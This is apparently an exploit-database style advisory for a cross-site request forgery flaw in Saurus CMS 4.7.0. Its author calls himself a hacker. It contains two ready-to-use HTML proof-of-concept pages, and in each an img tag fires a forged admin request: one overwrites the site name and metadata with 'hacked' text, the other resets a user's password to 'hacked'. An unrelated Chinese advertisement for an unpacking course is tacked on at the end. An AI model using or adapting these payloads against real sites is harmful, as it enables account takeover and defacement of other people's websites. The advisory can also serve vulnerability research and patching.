# Author: Fady Mohammed Osman (cute hacker)  

# Software Link: http://www.saurus.info/download/SaurusCMS-4.7.0.tgz  

# Version: 4.7.0  

# Tested on: Ubuntu 10.04  

# CVE : [Not available]  

# This vulnerability allows a malicious hacker to change password of a user  

and also it allows changing the website information.  

   

PoC 1:  

   

<html>  

<head><title>Saurus CSRF : Change site information</title></head>  

<body>  

<img src="http://localhost/saurus/admin/change_config.php?group=1&site_name=hacked+by+cutehacker&slogan=hacked&meta_title=hacked&meta_description=hacked&meta_keywords=hacked&save=1&flt_keel=1&page_end_html=&timezone=">  

</body>  

</html>  

   

PoC 2:  

   

<html>  

<head><title>Saurus CSRF : Change user's password</title></head>  

<body>  

<img src="http://localhost/saurus/admin/edit_user.php?tab=account&user_id=19&group_id=1&op=edit&op2=save&username=admin&password=hacked&password_confirmation=hacked&pass_expires=01.01.2029&is_predefined=1">  

</body>  

</html>

[课程]FART 脱壳王！加量不加价！FART作者讲授！